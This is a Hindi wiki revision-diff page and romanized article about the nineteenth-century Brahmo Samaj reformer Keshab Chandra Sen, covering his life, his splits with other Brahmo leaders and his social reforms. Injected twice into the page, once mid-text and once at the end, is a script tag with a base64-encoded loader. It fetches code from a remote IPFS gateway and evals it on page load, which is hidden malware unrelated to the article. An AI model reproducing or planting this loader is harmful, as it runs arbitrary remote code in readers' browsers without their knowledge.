Difference between revisions of "केशव चन्द्र सेन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Keshab-Chandra-Sen.png|thumb|केशव चन्द्र सेन]]
+
{{सूचना बक्सा प्रसिद्ध व्यक्तित्व
'''केशव चन्द्र सेन''' (जन्म- [[19 नवम्बर]], 1838, [[कलकत्ता]], [[पश्चिम बंगाल]], ब्रिटिश भारत; मृत्यु- [[8 जनवरी]], [[1884]], [[कलकत्ता]], बंगाल प्रेसीडेंसी) एक प्रसिद्ध धार्मिक व सामाज सुधारक, जो '[[ब्रह्मसमाज]]' के संस्थापकों में से एक थे। वे बड़े तीव्र बुद्धि, तार्किक और विद्वान युवक थे। उन्होंने उत्साहपूर्वक समाज को संगठित करना प्रारम्भ किया और इस कारण [[स्वामी दयानंद सरस्वती]] के कृपापात्र होकर वे शीघ्र ही उनके आचार्य पद पर नियुक्त हो गये। केशव चन्द्र सेन ने ही स्वामी दयानन्द सरस्वती को सलाह दी थी की वे '[[सत्यार्थ प्रकाश]]' की रचना [[हिन्दी]] में करें। केशव चन्द्र सेन और स्वामीजी के विचार आपस में नहीं मिलते थे, जिस कारण ब्रह्म समाज का विभाजन 'आदि ब्रह्मसमाज' और 'भारतवर्षीय ब्रह्मसमाज' में हो गया।  
+
|चित्र=Keshab-Chandra-Sen.png
 +
|चित्र का नाम=केशव चन्द्र सेन
 +
|पूरा नाम=
 +
|अन्य नाम=
 +
|जन्म=[[19 नवम्बर]], 1838
 +
|जन्म भूमि=[[कलकत्ता]], [[पश्चिम बंगाल]], ब्रिटिश भारत
 +
|मृत्यु=[[8 जनवरी]], [[1884]]
 +
|मृत्यु स्थान=[[कलकत्ता]], बंगाल प्रेसीडेंसी
 +
|अविभावक=प्यारेमोहन
 +
|पति/पत्नी=
 +
|संतान=
 +
|गुरु=
 +
|कर्म भूमि=[[भारत]]
 +
|कर्म-क्षेत्र=समाज सेवा
 +
|मुख्य रचनाएँ=
 +
|विषय=
 +
|खोज=
 +
|भाषा=
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=सामाज सुधारक
 +
|विशेष योगदान=सर्वांग उपासना की दीक्षा केशव चन्द्र द्वारा ही गई, जिसके भीतर उद्बोधन, आराधना, ध्यान, साधारण प्रार्थना, तथा शांतिवाचन, पाठ एवं उपदेश प्रार्थना का समावेश है।
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|शीर्षक 3=
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=विशेष
 +
|पाठ 5=केशव चन्द्र सेन के प्रयत्न से ही [[1872]] ई. में लड़कियों की [[विवाह]] की उम्र बढ़ाने का एक कानून बना।
 +
|अन्य जानकारी=इंग्लैण्ड से वापस लौटने पर केशव चन्द्र सेन ने 'इण्डियन रिफ़ोर्म ऐसोसियेशन' नामक संस्था बनाई थी। इसकी सदस्यता सभा जाति और [[धर्म]] के लोगों के लिए खुली थी।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
 
 +
'''केशव चन्द्र सेन''' (जन्म- [[19 नवम्बर]], 1838, [[कलकत्ता]], [[पश्चिम बंगाल]], ब्रिटिश भारत; मृत्यु- [[8 जनवरी]], [[1884]], [[कलकत्ता]], बंगाल प्रेसीडेंसी) एक प्रसिद्ध धार्मिक व सामाज सुधारक, जो '[[ब्रह्मसमाज]]' के संस्थापकों में से एक थे। वे बड़े तीव्र बुद्धि, तार्किक और विद्वान युवक थे। उन्होंने उत्साहपूर्वक समाज को संगठित करना प्रारम्भ किया और इस कारण वे शीघ्र ही आचार्य पद पर नियुक्त हो गये। केशव चन्द्र सेन ने ही [[आर्य समाज]] के संस्थापक स्वामी दयानन्द सरस्वती को सलाह दी थी की वे '[[सत्यार्थ प्रकाश]]' की रचना [[हिन्दी]] में करें। केशव चन्द्र सेन और स्वामीजी के विचार आपस में नहीं मिलते थे, जिस कारण ब्रह्म समाज का विभाजन 'आदि ब्रह्मसमाज' और 'भारतीय ब्रह्मसमाज' में हो गया।  
 
==जीवन परिचय==
 
==जीवन परिचय==
केशव चन्द्र सेन का जन्म 19 नवंबर, 1838 को [[कलकत्ता]] (आधुनिक कोलकाता), ब्रिटिश भारत में हुआ था। उनके [[पिता]] का नाम प्यारेमोहन था। वह प्रसिद्ध [[वैष्णव]] एवं विद्वान दीवान रामकमल के पुत्र थे। जब केशव चन्द्र सेन मात्र दस वर्ष के बालक ही थे, तभी इनके पिता का निधन हो गया था। ऐसे में इनके चाचा ने इन्हें पाला। केशव चन्द्र के आकर्षक व्यक्तित्व ने ही ब्रह्मसमाज आंदोलन को स्फूर्ति प्रदान की थी। उन्होंने [[भारत]] के शैक्षिक, सामाजिक तथा आध्यात्मिक पुनर्जन्म में चिर स्थायी योगदान दिया। [[1866]] में केशव चन्द्र ने 'भारतवर्षीय ब्रह्मसमाज' की स्थापना की। इसे देखकर देवेंद्रनाथ ने अपने समाज का नाम भी आदि ब्रह्मसमाज रख दिया था।
+
केशव चन्द्र सेन का जन्म 19 नवंबर, 1838 को [[कलकत्ता]] (आधुनिक कोलकाता), ब्रिटिश भारत में हुआ था। उनके [[पिता]] का नाम प्यारेमोहन था। वह प्रसिद्ध [[वैष्णव]] एवं विद्वान दीवान रायकमल सेन के पुत्र थे। रायकमल सेन बंगाल की एशियाटिक सोसायटी के मंत्री नियुक्त होने वाले पहले भारतीय थे। जब केशव चन्द्र सेन मात्र दस वर्ष के बालक ही थे, तभी इनके पिता का निधन हो गया था। ऐसे में इनके चाचा ने इन्हें पाला। केशव चन्द्र के आकर्षक व्यक्तित्व ने ही ब्रह्मसमाज आंदोलन को स्फूर्ति प्रदान की थी। उन्होंने [[भारत]] के शैक्षिक, सामाजिक तथा आध्यात्मिक पुनर्जन्म में चिर स्थायी योगदान दिया। [[1866]] में केशव चन्द्र ने 'भारतीय ब्रह्मसमाज' की स्थापना की। इसे देखकर देवेंद्रनाथ ने अपने समाज का नाम भी आदि ब्रह्मसमाज रख दिया था।
 
====आचार्य का पद====
 
====आचार्य का पद====
 
बाल्यावस्था से ही केशव चन्द्र का उच्च आध्यात्मिक जीवन था। वे बड़े तीव्र बुद्धि, तार्किक और विद्वान् युवक थे। महर्षि देवेन्द्रनाथ को वे [[ब्रह्मसमाज]] के लिए बड़े उपयोगी जान पड़े। [[1857]] में वे ब्रह्मसमाज में सम्मिलित हो गये। उन्होंने उत्साहपूर्वक समाज को संगठित करना प्रारम्भ किया और इस कारण महर्षि के कृपापात्र होकर वे शीघ्र ही उसके आचार्य पद पर नियुक्त हो गये, परन्तु केशव बाबू का आना ब्रह्म समाज के संगठन और स्वरूप के लिए अभिशाप बन गया। महर्षि देवेन्द्रनाथ और केशवबाबू के विचार नहीं मिलते थे, परिणामत: ब्रह्मसमाज का विभाजन हो गया। मूल ब्रह्मसमाज 'आदि ब्रह्मसमाज' के नाम से जाना जाने लगा और केशवबाबू का नवगठित समाज 'भारतवर्षीय ब्रह्मसमाज' के नाम से प्रसिद्ध हुआ।<ref name="aa">{{cite web |url=http://www.aryasamajindore.com/index.php/arya-bharat-2 |title=भाग्य विधाता महर्षि दयानंद सरस्वती- 2|accessmonthday= 07 नवम्बर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>
 
बाल्यावस्था से ही केशव चन्द्र का उच्च आध्यात्मिक जीवन था। वे बड़े तीव्र बुद्धि, तार्किक और विद्वान् युवक थे। महर्षि देवेन्द्रनाथ को वे [[ब्रह्मसमाज]] के लिए बड़े उपयोगी जान पड़े। [[1857]] में वे ब्रह्मसमाज में सम्मिलित हो गये। उन्होंने उत्साहपूर्वक समाज को संगठित करना प्रारम्भ किया और इस कारण महर्षि के कृपापात्र होकर वे शीघ्र ही उसके आचार्य पद पर नियुक्त हो गये, परन्तु केशव बाबू का आना ब्रह्म समाज के संगठन और स्वरूप के लिए अभिशाप बन गया। महर्षि देवेन्द्रनाथ और केशवबाबू के विचार नहीं मिलते थे, परिणामत: ब्रह्मसमाज का विभाजन हो गया। मूल ब्रह्मसमाज 'आदि ब्रह्मसमाज' के नाम से जाना जाने लगा और केशवबाबू का नवगठित समाज 'भारतवर्षीय ब्रह्मसमाज' के नाम से प्रसिद्ध हुआ।<ref name="aa">{{cite web |url=http://www.aryasamajindore.com/index.php/arya-bharat-2 |title=भाग्य विधाता महर्षि दयानंद सरस्वती- 2|accessmonthday= 07 नवम्बर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>
Line 11: Line 51:
 
====ब्रह्मसमाजियों की कट्टरता====
 
====ब्रह्मसमाजियों की कट्टरता====
 
केशव चन्द्र का विधान (दैवी संव्यवहार विधि), आवेश (साकार ब्रह्म की प्रत्यक्ष प्रेरणा), तथा साधुसमागम (संतों तथा धर्मगुरुओं से आध्यात्मिक संयोग) पर विशेष बल देना ब्रह्मसमाजियों के एक दल विशेष को, जो नितांत तर्कवादी एवं कट्टर विधानवादी था, अच्छा न लगा। यह तथा केशव चन्द्र की पुत्री के [[कूचबिहार]] के महाराज के साथ [[विवाह]] विषयक मतभेद विघटन के कारण बने, जिसका परिणाम यह हुआ कि पंडित शिवनाथ शास्त्री के सशक्त नेतृत्व में [[1878]] में 'साधारण ब्रह्मसमाज' की स्थापना हुई।
 
केशव चन्द्र का विधान (दैवी संव्यवहार विधि), आवेश (साकार ब्रह्म की प्रत्यक्ष प्रेरणा), तथा साधुसमागम (संतों तथा धर्मगुरुओं से आध्यात्मिक संयोग) पर विशेष बल देना ब्रह्मसमाजियों के एक दल विशेष को, जो नितांत तर्कवादी एवं कट्टर विधानवादी था, अच्छा न लगा। यह तथा केशव चन्द्र की पुत्री के [[कूचबिहार]] के महाराज के साथ [[विवाह]] विषयक मतभेद विघटन के कारण बने, जिसका परिणाम यह हुआ कि पंडित शिवनाथ शास्त्री के सशक्त नेतृत्व में [[1878]] में 'साधारण ब्रह्मसमाज' की स्थापना हुई।
 +
====सामाजिक कार्य====
 +
[[1870]] में इंग्लैण्ड से वापस लौटने पर केशव चन्द्र सेन ने 'इण्डियन रिफ़ोर्म ऐसोसियेशन' नामक संस्था बनाई थी। इसकी सदस्यता सभा जाति और [[धर्म]] के लोगों के लिए खुली थी। संस्था की ओर से 'सुलभ समाचार' नामक पत्र भी निकाला गया। स्त्रियों के लिए स्कूल और एक कॉलेज भी खोला गया। उनके प्रयत्न से ही [[1872]] ई. में लड़कियों की [[विवाह]] की उम्र बढ़ाने का एक कानून भी बना।
 
==निधन==
 
==निधन==
केशव चन्द्र सेन का निधन [[8 जनवरी]], [[1884]] को [[कोलकाता]] में हुआ।
+
केशव चन्द्र सेन का निधन [[8 जनवरी]], [[1884]] को [[कोलकाता]] में हुआ।  
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 09:57, 7 November 2013

keshav chandr sen
janm 19 navambar, 1838
janm bhoomi kalakatta, pashchim bangal, british bharat
mrityu 8 janavari, 1884
mrityu sthan kalakatta, bangal presideansi
karm bhoomi bharat
karm-kshetr samaj seva
prasiddhi samaj sudharak
vishesh yogadan sarvaang upasana ki diksha keshav chandr dvara hi gee, jisake bhitar udbodhan, aradhana, dhyan, sadharan prarthana, tatha shaantivachan, path evan upadesh prarthana ka samavesh hai.
nagarikata bharatiy
vishesh keshav chandr sen ke prayatn se hi 1872 ee. mean l dakiyoan ki vivah ki umr badhane ka ek kanoon bana.
any janakari ianglaind se vapas lautane par keshav chandr sen ne 'indiyan riform aisosiyeshan' namak sanstha banaee thi. isaki sadasyata sabha jati aur dharm ke logoan ke lie khuli thi.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

keshav chandr sen (janm- 19 navambar, 1838, kalakatta, pashchim bangal, british bharat; mrityu- 8 janavari, 1884, kalakatta, bangal presideansi) ek prasiddh dharmik v samaj sudharak, jo 'brahmasamaj' ke sansthapakoan mean se ek the. ve b de tivr buddhi, tarkik aur vidvan yuvak the. unhoanne utsahapoorvak samaj ko sangathit karana prarambh kiya aur is karan ve shighr hi achary pad par niyukt ho gaye. keshav chandr sen ne hi ary samaj ke sansthapak svami dayanand sarasvati ko salah di thi ki ve 'satyarth prakash' ki rachana hindi mean karean. keshav chandr sen aur svamiji ke vichar apas mean nahian milate the, jis karan brahm samaj ka vibhajan 'adi brahmasamaj' aur 'bharatiy brahmasamaj' mean ho gaya.

jivan parichay

keshav chandr sen ka janm 19 navanbar, 1838 ko kalakatta (adhunik kolakata), british bharat mean hua tha. unake pita ka nam pyaremohan tha. vah prasiddh vaishnav evan vidvan divan rayakamal sen ke putr the. rayakamal sen bangal ki eshiyatik sosayati ke mantri niyukt hone vale pahale bharatiy the. jab keshav chandr sen matr das varsh ke balak hi the, tabhi inake pita ka nidhan ho gaya tha. aise mean inake chacha ne inhean pala. keshav chandr ke akarshak vyaktitv ne hi brahmasamaj aandolan ko sphoorti pradan ki thi. unhoanne bharat ke shaikshik, samajik tatha adhyatmik punarjanm mean chir sthayi yogadan diya. 1866 mean keshav chandr ne 'bharatiy brahmasamaj' ki sthapana ki. ise dekhakar deveandranath ne apane samaj ka nam bhi adi brahmasamaj rakh diya tha.

achary ka pad

balyavastha se hi keshav chandr ka uchch adhyatmik jivan tha. ve b de tivr buddhi, tarkik aur vidvanh yuvak the. maharshi devendranath ko ve brahmasamaj ke lie b de upayogi jan p de. 1857 mean ve brahmasamaj mean sammilit ho gaye. unhoanne utsahapoorvak samaj ko sangathit karana prarambh kiya aur is karan maharshi ke kripapatr hokar ve shighr hi usake achary pad par niyukt ho gaye, parantu keshav baboo ka ana brahm samaj ke sangathan aur svaroop ke lie abhishap ban gaya. maharshi devendranath aur keshavababoo ke vichar nahian milate the, parinamat: brahmasamaj ka vibhajan ho gaya. mool brahmasamaj 'adi brahmasamaj' ke nam se jana jane laga aur keshavababoo ka navagathit samaj 'bharatavarshiy brahmasamaj' ke nam se prasiddh hua.[1]

yogadan

keshav chandr ke prerak netritv mean bharat ka brahmasamaj desh ki ek mahati shakti ban gaya. isaki vistritadhariy sarvavyapti ki abhivyakti shlok sangrah mean huee, jo ek apoorv sangrah hai tatha sabhi rashtroan evan sabhi yugoan ke dharm granthoan mean apane prakar ki pratham kriti hai. sarvaang upasana ki diksha keshav chandr dvara hi gee, jisake bhitar udbodhan, aradhana, dhyan, sadharan prarthana, tatha shaantivachan, path evan upadesh prarthana ka samavesh hai. sabhi bhaktoan ke lie yah unaka amooly dan hai. dharmatatv ne tatkalin darshanik vicharadhara ko navin roop diya. 1870 mean keshav chandr ne ianglaiand ki yatra ki. is yatra se poorv tatha pashchim ek doosare ke nikat ae tatha aantararashtriy ekata ka marg prashast hua. 1875 mean keshav chandr ne eeshvar ke nivan svaroop-nav vidhan samaroop dharm[2] navin dharm ki sanpoornata ka sandesh diya.

eesaiyat ke prati prem

keshav chandr sen ki shiksha-diksha pashchaty sanskaroan ke sath huee thi. svabhavat: eesaiyat ke prati unamean apar utsah tha. ve eesa ko eshiya ka mahapurush hi nahian, samast manav jati ka trata manate the aur apane anuyayiyoan ko eesaee mat ki dharmik evan achar moolak shikshaoan ko khuleam apanane ki prerana dete the. ‘Prophets of New India’ namak pustak mean romy aauan rol aauan likhate haian- "Keshab Chandra Sen ran counter to the rising tide of national conciousness then feverishly awakening" arthath‌ keshavachandr sen desh mean b di teji se ubharati huee rashtriy chetana ke viruddh dau de. jab neta mean hi deshabhakti ki bhavana n ho to usake anuyayiyoan ka kya kahana ! vastut: keshav baboo ke apane koee siddhant nahian the. hindoo dharm ki manyataoan ko nakarane ke karan unake dvar sabake lie khule the. kintu ve poori tarah eesaiyat ke rang mean range hue the aur is karan brahmasamaj ko eesaee samaj ka bharatiy sanskaran banana chahate the. apani prakhar buddhi tatha ojasvi vani ke karan ve bangal mean hi nahian, samooche desh mean prasiddh ho gaye the.[1]

brahmasamajiyoan ki kattarata

keshav chandr ka vidhan (daivi sanvyavahar vidhi), avesh (sakar brahm ki pratyaksh prerana), tatha sadhusamagam (santoan tatha dharmaguruoan se adhyatmik sanyog) par vishesh bal dena brahmasamajiyoan ke ek dal vishesh ko, jo nitaant tarkavadi evan kattar vidhanavadi tha, achchha n laga. yah tatha keshav chandr ki putri ke koochabihar ke maharaj ke sath vivah vishayak matabhed vighatan ke karan bane, jisaka parinam yah hua ki pandit shivanath shastri ke sashakt netritv mean 1878 mean 'sadharan brahmasamaj' ki sthapana huee.

samajik kary

1870 mean ianglaind se vapas lautane par keshav chandr sen ne 'indiyan riform aisosiyeshan' namak sanstha banaee thi. isaki sadasyata sabha jati aur dharm ke logoan ke lie khuli thi. sanstha ki or se 'sulabh samachar' namak patr bhi nikala gaya. striyoan ke lie skool aur ek k aaulej bhi khola gaya. unake prayatn se hi 1872 ee. mean l dakiyoan ki vivah ki umr badhane ka ek kanoon bhi bana.

nidhan

keshav chandr sen ka nidhan 8 janavari, 1884 ko kolakata mean hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 bhagy vidhata maharshi dayanand sarasvati- 2 (hiandi). . abhigaman tithi: 07 navambar, 2013.
  2. aupacharik roop se 1880 mean ghoshit

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>